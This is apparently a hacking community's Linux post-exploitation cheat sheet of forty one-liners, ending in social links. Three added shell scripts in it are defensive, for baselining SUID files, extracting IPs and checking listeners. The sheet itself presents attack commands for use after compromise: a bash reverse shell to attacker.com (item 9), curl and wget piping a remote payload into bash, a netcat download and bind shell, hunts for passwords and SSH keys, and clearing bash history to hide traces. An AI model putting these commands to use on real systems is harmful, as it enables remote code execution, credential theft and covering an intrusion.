1. Find All SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Identifies SUID binaries that may allow privilege escalation due to misconfiguration.

2. Find World-Writable Files

find / -type f -perm -2 -ls 2>/dev/null

Locates files writable by anyone — often abused for privilege escalation or persistence.
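Added example, not part of the original cheat sheet: the defender-side use of commands 1 and 2. It snapshots SUID binaries and world-writable files under a directory, saves the lists as a baseline, and later reports anything that appeared since. The directory tree, file names and baseline locations are all constructed in temp dirs; the same find predicates extend to world-writable directories (-type d).

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): take a baseline of SUID
# binaries and world-writable files under a root directory, then report entries
# that appeared since the baseline. Everything below lives in temp dirs.

# List SUID regular files under $1, sorted, one path per line.
snapshot_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# List world-writable regular files under $1 (swap -type f for -type d for dirs).
snapshot_ww() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# Print lines present in the current snapshot ($2) but absent from the baseline ($1).
new_entries() {
    comm -13 "$1" "$2"
}

# Print the number of lines on stdin (0 for empty input, no leading spaces).
count_lines() {
    awk 'END { print NR }'
}

# Demo on a constructed tree; prints "SUID_NEW=<n> WW_NEW=<n>".
run_demo() {
    root=$(mktemp -d)   # simulated filesystem root that gets scanned
    work=$(mktemp -d)   # baseline storage, kept outside the scanned tree
    mkdir -p "$root/usr/bin" "$root/var/tmp"

    printf '#!/bin/sh\nexit 0\n' > "$root/usr/bin/legit"
    chmod 4755 "$root/usr/bin/legit"       # expected SUID binary in the baseline
    printf 'notes\n' > "$root/var/tmp/notes"
    chmod 0644 "$root/var/tmp/notes"       # not world-writable at baseline time

    snapshot_suid "$root" > "$work/suid.base"
    snapshot_ww   "$root" > "$work/ww.base"

    # Simulate drift: a new SUID file appears and an existing file becomes 666.
    cp "$root/usr/bin/legit" "$root/var/tmp/dropped"
    chmod 4755 "$root/var/tmp/dropped"
    chmod 0666 "$root/var/tmp/notes"

    snapshot_suid "$root" > "$work/suid.cur"
    snapshot_ww   "$root" > "$work/ww.cur"

    suid_new=$(new_entries "$work/suid.base" "$work/suid.cur" | count_lines)
    ww_new=$(new_entries "$work/ww.base" "$work/ww.cur" | count_lines)

    rm -rf "$root" "$work"
    printf 'SUID_NEW=%s WW_NEW=%s\n' "$suid_new" "$ww_new"
}

run_demo
```

On a real host point snapshot_suid and snapshot_ww at / and keep the baseline off the box; the diff against the baseline is the signal worth investigating, not the raw list, which is long on any distribution.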

3. List Open Network Ports (netstat)

netstat -tulnp 2>/dev/null

Displays listening services and associated processes on the system.

4. List Open Network Ports (ss)

ss -tulnp

Modern replacement for netstat; faster and commonly available.

5. Discover Live Hosts in a Subnet

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep "64 bytes" & done

Quick host discovery for lateral movement after initial compromise.

6. Download File Without wget/curl

printf 'GET /evil.sh HTTP/1.0\r\nHost: yourhost.com\r\n\r\n' | nc yourhost.com 80 | sed '1,/^[[:cntrl:]]*$/d' > evil.sh

Downloads files using netcat when standard tools are unavailable. printf is used because echo does not interpret \r\n in every shell, the request has to end with an empty line, and the sed drops the HTTP response headers so only the body is saved.

7. Start a Simple HTTP Server (Python 3)

python3 -m http.server 8000

Hosts payloads or enables quick file exfiltration.

8. Start a Simple HTTP Server (Python 2)

python -m SimpleHTTPServer 8000

Legacy alternative for older systems.

9. Bash Reverse Shell

bash -i >& /dev/tcp/attacker.com/4444 0>&1

Spawns a reverse shell using Bash only — useful in RCE scenarios.

10. Dump All User Crontabs

for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done

Enumerates scheduled tasks that may contain credentials or exploitable scripts.

11. Search for Keywords in Files

grep -Ri 'password' /etc 2>/dev/null

Finds hardcoded secrets such as passwords or API keys.

12. List Running Processes (Full Arguments)

ps auxww

Displays all running processes without truncation — useful for spotting secrets.

13. Extract IP Addresses from a File

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' filename.txt | sort -u

Parses logs or files to extract unique IP addresses.
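Added example, not part of the original cheat sheet: a stricter version of command 13. The plain regex above also matches strings like 999.1.1.1 and the leading part of 1.2.3.4567, so this version tokenizes the input first, requires a whole-token match, and checks that every octet is in 0-255. The log lines are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): extract IPv4 addresses from
# text, keeping only tokens that are a complete dotted quad with octets 0-255.

# Constructed sample log lines, including two non-addresses that a bare regex accepts.
SAMPLE_LOG='Jan 10 12:00:01 host sshd[812]: Accepted publickey for admin from 10.0.0.7 port 51000
Jan 10 12:00:05 host sshd[813]: Failed password for invalid user test from 203.0.113.45 port 40022
Jan 10 12:00:09 host app[900]: build id 999.1.1.1 is not an address; version 1.2.3.4567 neither
Jan 10 12:00:10 host app[900]: connection from 10.0.0.7 again.'

# extract_ips: stdin -> unique valid IPv4 addresses, one per line.
# 1. tr puts every run of digits/dots on its own line (so adjacent IPs do not merge)
# 2. sed strips sentence punctuation such as a trailing period
# 3. grep -x keeps only tokens that are exactly four 1-3 digit groups
# 4. awk rejects any octet above 255
extract_ips() {
    tr -cs '0-9.' '\n' \
    | sed 's/^\.*//; s/\.*$//' \
    | grep -Ex '([0-9]{1,3}\.){3}[0-9]{1,3}' \
    | awk -F. '$1 <= 255 && $2 <= 255 && $3 <= 255 && $4 <= 255' \
    | sort -u
}

# Run the extractor over the constructed sample.
demo_ips() {
    printf '%s\n' "$SAMPLE_LOG" | extract_ips
}

demo_ips
```

Use it as extract_ips < auth.log; the output for the sample is 10.0.0.7 and 203.0.113.45 only.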

14. List Listening Services with Executables

lsof -i -P -n | grep LISTEN

Maps listening ports to binaries for service identification.
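Added example, not part of the original cheat sheet: a check that turns the output of commands 3, 4 and 14 into something a defender can act on. It normalizes ss -tulnp output to "proto/port program" and prints only sockets that are not on an allowlist of expected listeners. The ss output and the allowlist are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): normalize `ss -tulnp`
# output to "proto/port program" and report sockets missing from an allowlist.

# Expected listeners for this host (constructed allowlist, one per line).
ALLOWED='tcp/22 sshd
udp/53 systemd-resolve'

# Constructed sample in the column layout produced by `ss -tulnp`.
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53     0.0.0.0:*         users:(("systemd-resolve",pid=501,fd=12))
tcp   LISTEN 0      128    0.0.0.0:22           0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128    0.0.0.0:4444         0.0.0.0:*         users:(("nc",pid=2044,fd=3))
tcp   LISTEN 0      511    [::]:22              [::]:*            users:(("sshd",pid=812,fd=4))'

# normalize_listeners: ss output on stdin -> "proto/port program" per socket.
# The port is whatever follows the last ":" of the local address, so "[::]:22"
# and scoped addresses like "127.0.0.53%lo:53" both work. Sockets whose owner
# is not visible (no -p, or insufficient privilege) get program "-".
normalize_listeners() {
    awk 'NR > 1 {
        n = split($5, a, ":"); port = a[n]
        prog = "-"
        if (match($0, /\(\("[^"]+"/)) prog = substr($0, RSTART + 3, RLENGTH - 4)
        print $1 "/" port " " prog
    }'
}

# unexpected_listeners ALLOWLIST_FILE: ss output on stdin -> lines not allowlisted.
# (NR == FNR reads the allowlist first; it must be non-empty for that idiom.)
unexpected_listeners() {
    normalize_listeners | awk 'NR == FNR { ok[$0] = 1; next } !($0 in ok)' "$1" -
}

# Run the check on the constructed sample; prints only the unexpected sockets.
demo_unexpected() {
    allow=$(mktemp)
    printf '%s\n' "$ALLOWED" > "$allow"
    printf '%s\n' "$SAMPLE_SS" | unexpected_listeners "$allow"
    rm -f "$allow"
}

demo_unexpected
```

On a live host run ss -tulnp | unexpected_listeners /etc/expected-listeners; the sample above yields a single line, tcp/4444 nc, while the two sshd sockets collapse to the allowed tcp/22 sshd.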

15. Base64 Encode

printf '%s' 'yourstring' | base64

Encodes payloads for obfuscation or transport. printf '%s' is used instead of echo so the trailing newline is not encoded along with the string.

16. Base64 Decode

echo 'b3BlbnNlc2FtZQ==' | base64 -d

Decodes Base64-encoded data during analysis.

17. Find Recently Modified Files

find /tmp -type f -mmin -10 2>/dev/null

Detects recently dropped files — useful for malware or attacker activity.

18. Replace Strings in Multiple Files

find . -type f -exec sed -i 's/oldstring/newstring/g' {} +

Mass-edits configs or payloads quickly.

19. Download and Execute Script in Memory (curl)

curl http://attacker.com/payload.sh | bash

Executes payloads without touching disk.

20. Download and Execute Script in Memory (wget)

wget -qO- http://attacker.com/payload.sh | bash

Alternative in-memory execution method.

21. Find Hidden Files and Directories

find / -name ".*" 2>/dev/null

Reveals hidden files often used to store credentials or flags.

22. View Recent Login Activity

last -a | head -10

Shows the most recent logins, with source host and time, to reveal who uses the system and when.

23. List Environment Variables

env

Displays environment variables that may contain secrets.

24. Dump Environment Variables to File

env > /tmp/envdump.txt

Stores environment data for offline analysis.

25. Netcat Bind Shell

nc -lvnp 4444 -e /bin/bash

Creates a listening shell for lateral movement.

26. Get Internal IP Address

hostname -I

Quickly identifies local network addresses.

27. Enumerate Network Interfaces

ip addr show | grep 'inet ' | awk '{print $2}'

Alternative method to list assigned IPs.

28. Check Sudo Privileges

sudo -l

Shows which commands the current user may run through sudo, and as which target user.

29. Search for SSH Private Keys

find /home -name "id_rsa*" 2>/dev/null

Locates SSH keys for lateral movement or persistence.

30. Find World-Readable Password Files

find / -type f -name "*pass*" -perm -o=r 2>/dev/null

Finds readable files likely containing credentials.

31. Identify UID 0 Users

awk -F: '($3 == "0") {print $1}' /etc/passwd

Detects additional root-level accounts.

32. Download and Extract Zip in One Line

curl -sL http://attacker.com/payload.zip | funzip > payload.sh

Streams and extracts payloads efficiently.

33. List Largest Files

find / -type f -exec du -h {} + | sort -rh | head -20

Identifies large files — possible data dumps or logs.

34. Directory Bruteforce Without Tools

for word in $(cat wordlist.txt); do curl -s -o /dev/null -w "%{http_code} %{url_effective}\n" http://target/$word; done

Finds hidden directories when gobuster is unavailable.

35. List USB Devices

lsusb

Identifies connected USB devices (forensics or exfil checks).

36. Get Quick System Information

uname -a; uptime; cat /etc/os-release

Collects kernel, uptime, and OS details for exploit matching.

37. Check Logged-In Users

who

Shows currently logged-in users.

38. Find Writable Directories

find / -type d -perm -2 -ls 2>/dev/null

Locates directories suitable for payload drops.

39. List Services with systemd

systemctl list-units --type=service

Enumerates active services on systemd-based systems.

40. Clear Bash History

history -c && history -w && unset HISTFILE

Attempts to remove command history and reduce traces.

Keep yourself updated.

Links to all official accounts of our community:

Facebook group: https://www.facebook.com/share/g/97BPHjjVqcvYjDLb/?mibextid=A7sQZp

Facebook Page: https://www.facebook.com/share/19yLuQv3i3/

YouTube: https://youtube.com/@h4k2liv3

WhatsApp: https://whatsapp.com/channel/0029ValXkvl8V0tnKJzt6e0f

Discord Server: https://discord.gg/zyrDWRqgM2

LinkedIn Page: https://www.linkedin.com/company/h4k2liv3-academy/

Telegram Channel: t.me/h4k2liv3

H4K2LIV3 Student Registration Form link: https://forms.gle/3nwp366AC7N8LoWi8

Our Roadmap Link : https://docs.google.com/.../1Q6uG1dhg2X3hIyeBXvSF.../edit...